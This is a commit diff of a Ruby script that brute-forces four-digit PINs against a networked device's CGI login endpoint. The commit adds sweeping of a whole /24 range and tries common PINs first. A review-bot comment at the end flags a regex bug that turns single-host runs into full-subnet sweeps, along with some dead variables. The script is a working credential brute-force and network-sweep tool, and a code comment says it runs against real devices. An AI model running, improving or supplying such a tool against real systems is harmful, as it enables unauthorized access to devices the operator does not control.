better sweep/specific support
This commit is contained in:
parent
6e06c207a4
commit
fbf855a295
@ -17,12 +17,12 @@ def get_request(uri, pin)
|
|||||||
request['Referer'] = sprintf('http://%s/login', uri.host)
|
request['Referer'] = sprintf('http://%s/login', uri.host)
|
||||||
request['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'
|
request['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'
|
||||||
|
|
||||||
# TODO saying there is a cookie set, but we're def not authed.. do we need to rotate this to avoid rate limiting?
|
# TODO determine necessity of this, given fuzzing, it's probably unnecessary
|
||||||
request['Cookie'] = sprintf('_ga=GA1.4.595462255.%s', Time.now.to_i)
|
request['Cookie'] = sprintf('_ga=GA1.4.595462255.%s', Time.now.to_i)
|
||||||
|
|
||||||
body = Array.new
|
body = Array.new
|
||||||
|
|
||||||
body << '-----------------------------7da24f2e50046' # TODO is this a magic number or randomly generated? or?
|
body << '-----------------------------7da24f2e50046' # this is a magic number: https://stackoverflow.com/questions/37701805/ie11-content-type-false-in-ie11-it-doesnt-work
|
||||||
body << 'Content-Disposition: form-data; name="file"; filename="temp.txt"' # TODO should look into what happens when we point at a different file..
|
body << 'Content-Disposition: form-data; name="file"; filename="temp.txt"' # TODO should look into what happens when we point at a different file..
|
||||||
body << 'Content-type: plain/text'
|
body << 'Content-type: plain/text'
|
||||||
body << '' # newline
|
body << '' # newline
|
||||||
@ -52,31 +52,57 @@ responses = Array.new
|
|||||||
output = sprintf('%s-logs-%s.%s.%s.json', __FILE__, address, Time.now.to_i, $$)
|
output = sprintf('%s-logs-%s.%s.%s.json', __FILE__, address, Time.now.to_i, $$)
|
||||||
|
|
||||||
if address.nil?
|
if address.nil?
|
||||||
puts sprintf('usage: %s <address>', __FILE__)
|
puts sprintf('usage: %s <ipaddress/range>', __FILE__)
|
||||||
|
puts sprintf(' %s 192.168.1.42', __FILE__)
|
||||||
|
puts sprintf(' %s 192.168.1.*', __FILE__)
|
||||||
exit 1
|
exit 1
|
||||||
end
|
end
|
||||||
|
|
||||||
1.upto(254) do |octet|
|
mode = address.match(/^(?:\d{1,3}){3}\.\d{1,3}$/) ? :ip : :range
|
||||||
base = $1 if address.match(/((?:\d{1,3}){3}\.)/)
|
targets = Array.new
|
||||||
ip = sprintf('%s.%s', base, octet)
|
|
||||||
9999.downto(0) do |i|
|
if mode.eql?(:ip)
|
||||||
# TODO we should prioritize 0000, 1234, etc
|
targets << address
|
||||||
|
elsif mode.eql?(:range)
|
||||||
|
base = address.split('.')[0..2].join('.')
|
||||||
|
1.upto(254) do |octet|
|
||||||
|
targets << sprintf('%s.%s', base, octet)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
pins = 9999.downto(0).to_a
|
||||||
|
prioritized = [1234, 2546, 1739, 9876, 1425, 4152] # commonly used PINs
|
||||||
|
|
||||||
|
# commonly used PINs that follow a pattern
|
||||||
|
0.upto(9) do |i|
|
||||||
|
prioritized << i * 1111
|
||||||
|
end
|
||||||
|
|
||||||
|
prioritized.each do |p|
|
||||||
|
pins.delete(p)
|
||||||
|
pins.unshift(p)
|
||||||
|
end
|
||||||
|
|
||||||
|
targets.each do |target|
|
||||||
|
|
||||||
|
pins.each do |i|
|
||||||
|
|
||||||
pin = sprintf('%04d', i)
|
pin = sprintf('%04d', i)
|
||||||
|
|
||||||
begin
|
begin
|
||||||
url = sprintf('http://%s/cgi-bin/cgiclient.cgi?CGI.RequestProperties=', address)
|
url = sprintf('http://%s/cgi-bin/cgiclient.cgi?CGI.RequestProperties=', target)
|
||||||
|
|
||||||
puts sprintf('trying pin[%s]', pin)
|
puts sprintf('trying pin[%s]', pin)
|
||||||
|
|
||||||
response = check_pin(url, pin)
|
response = check_pin(url, pin)
|
||||||
|
|
||||||
responses << response
|
responses << response
|
||||||
|
|
||||||
|
# <properties sys.validate-password="0"></properties>
|
||||||
if response.body.match(/1/)
|
if response.body.match(/1/)
|
||||||
puts sprintf('INFO: found the pin[%s]', pin)
|
puts sprintf('INFO: found the pin[%s]', pin)
|
||||||
break
|
break
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# this was necessary when testing against a local server, but not against real devices
|
||||||
#sleep 1 if (i % 100).eql?(0)
|
#sleep 1 if (i % 100).eql?(0)
|
||||||
|
|
||||||
rescue => e
|
rescue => e
|
||||||
@ -87,30 +113,6 @@ ip = sprintf('%s.%s', base, octet)
|
|||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
# marshalling the data, at least until we know what we're looking for
|
|
||||||
begin
|
|
||||||
|
|
||||||
content = Array.new
|
|
||||||
responses.each do |response|
|
|
||||||
hash = {
|
|
||||||
:code => response.code,
|
|
||||||
:body => response.body,
|
|
||||||
:size => response.body.size,
|
|
||||||
}
|
|
||||||
|
|
||||||
content << hash
|
|
||||||
end
|
|
||||||
|
|
||||||
File.open(output, 'w') do |fh|
|
|
||||||
fh.print(JSON.pretty_generate(content))
|
|
||||||
end
|
|
||||||
|
|
||||||
puts sprintf('SUCCESS: wrote output to[%s]', output)
|
|
||||||
rescue => e
|
|
||||||
puts sprintf('ERROR: [%s]: %s[%s]', e.message, "\n", e.backtrace.join("\n"))
|
|
||||||
end
|
|
||||||
|
|
||||||
# TODO something better here
|
# TODO something better here
|
||||||
errors.each do |e|
|
errors.each do |e|
|
||||||
puts sprintf('ERROR: pin[%s] trace[%s]', e[:pin], e[:exception])
|
puts sprintf('ERROR: pin[%s] trace[%s]', e[:pin], e[:exception])
|
||||||
|
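Review bot: The `:ip` detection in `mode = address.match(/^(?:\d{1,3}){3}\.\d{1,3}$/) ? :ip : :range` can never match a dotted address such as the `192.168.1.42` example the new usage text prints, because `(?:\d{1,3}){3}` consumes three digit groups with no dots between them; a single-host argument therefore falls through to `:range`, and the script then contacts every host in that /24 instead of the one it was given. The anchors should also cover the whole string, since `^`/`$` are per-line in Ruby: `mode = address.match?(/\A\d{1,3}(?:\.\d{1,3}){3}\z/) ? :ip : :range`. The `:range` branch accepts any string with three or more dot-separated parts, so a malformed argument still produces a sweep; rejecting input that is neither a full address nor an `a.b.c.*` pattern before `targets` is built would keep the run limited to what was explicitly requested. Separately, with the JSON dump removed in the third hunk, `output` is assigned but never used and `responses` is appended to on every request but never read, so both should go or the write-out should be restored; `errors` is referenced in the last hunk but defined outside it.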